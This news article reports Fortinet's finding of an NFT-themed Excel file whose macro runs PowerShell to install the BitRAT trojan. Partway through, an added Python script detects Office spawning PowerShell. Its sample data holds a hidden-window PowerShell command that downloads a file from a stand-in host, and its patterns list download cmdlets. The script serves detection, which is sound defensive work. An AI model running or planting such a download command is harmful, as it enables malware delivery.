
JAKARTA - As usual, when something is trending, cybercriminals target it too, and the popularity of non-fungible tokens (NFTs) is no exception.

An NFT is a digital token that uses blockchain to verify content authenticity and digital ownership. When there are trends and money involved, people quickly become interested.

Cybercriminals in this case try to trick victims into downloading trojan malware that is capable of hijacking their PCs while stealing usernames and passwords.

Cybersecurity researchers at Fortinet report seeing what they describe as a strange Excel spreadsheet that at first appears to contain information about NFTs, but whose real purpose is to aid in the delivery of malware dubbed BitRAT.

BitRAT is a remote access trojan (RAT) that first appeared for sale on underground forums in August 2020. What's unique about BitRAT is that it can bypass User Account Control (UAC), a Windows feature that helps prevent unauthorized changes to the operating system.

The malware comes with a variety of trojan functions, including the ability to steal login credentials from browsers and applications, the ability to log keystrokes and the ability to upload and download files.

This version of BitRAT can also monitor the victim's screen in real time, use their webcam and listen to audio through the microphone. That means this malware can freely stalk victims.

According to ZDNet on Friday, February 18th, the report unfortunately doesn't go into detail about how the malicious Excel file reaches the victim, but the file does offer information about the estimated potential return on investment and the number of NFTs available in each series.

The Excel file also contains a link to a legitimate Discord channel about NFTs, meaning it's likely that the intended victim is an NFT fan. The Excel file contains a malicious macro which, when enabled, runs a PowerShell script that retrieves and downloads the malware before running it silently on the compromised PC.
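The macro-to-PowerShell chain described above leaves a recognizable process-creation trace that defenders can alert on. As an added example (not from the Fortinet report or this article), the following Python triages process-creation events for Excel or another Office application spawning PowerShell, and raises severity when the command line also downloads content or hides itself. The events are constructed, with field names modeled on Sysmon Event ID 1; the process lists and patterns are assumptions to tune locally.

```python
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}  # assumed list, extend locally
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Assumed indicator patterns: download cmdlets/classes, hidden window or encoded command.
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
                      r"start-bitstransfer|net\.webclient", re.I)
STEALTH = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b|-e(?:nc\w*)?\s|-nop\b", re.I)

# Constructed sample events; none of these values come from the report.
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FIELDS = ("Computer", "ParentImage", "Image", "CommandLine")
SAMPLE_EVENTS = [dict(zip(FIELDS, row)) for row in [
    ("WS-01", EXCEL, PS, 'powershell.exe -WindowStyle Hidden -Command '
     '"Invoke-WebRequest -Uri http://example.invalid/f -OutFile f.bin"'),
    ("WS-02", r"C:\Windows\explorer.exe", PS, "powershell.exe -Command Get-ChildItem"),
    ("WS-03", EXCEL, r"C:\Windows\splwow64.exe", "splwow64.exe 8192"),
    ("WS-04", EXCEL, PS, "powershell.exe -Command Get-Date"),
]]

def _name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def reasons_for(event):
    """Return why an event matches the Office -> PowerShell pattern (empty list if not)."""
    parent, child = _name(event["ParentImage"]), _name(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return []
    reasons = ["office-spawned-powershell"]
    if DOWNLOAD.search(event["CommandLine"]):
        reasons.append("download-command")
    if STEALTH.search(event["CommandLine"]):
        reasons.append("hidden-or-encoded")
    return reasons

def triage(events):
    """Return one alert per matching event; extra indicators raise severity."""
    alerts = []
    for ev in events:
        why = reasons_for(ev)
        if why:
            alerts.append({"host": ev["Computer"], "reasons": why,
                           "severity": "high" if len(why) > 1 else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

PowerShell launched from a non-Office parent (WS-02) and Excel starting an ordinary helper process (WS-03) are not flagged, which keeps the rule focused on the parent-child pair the article describes.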

Apart from collecting data and stalking victims, BitRAT can also install cryptojacking malware on infected PCs, allowing attackers to secretly use the machines' processing power to mine the Monero cryptocurrency.

Since NFTs can change hands for large sums of money, it's more likely that cybercriminals are after financial gain. But even if the victim does not have NFTs, the amount of personal information that can be stolen with the trojan malware can be very valuable to the attacker, and damaging to the victim.

To prevent this, Fortinet researchers warn against opening files downloaded from untrusted or suspicious sources. This could prevent threat actors from gaining access to users' money and valuable data.

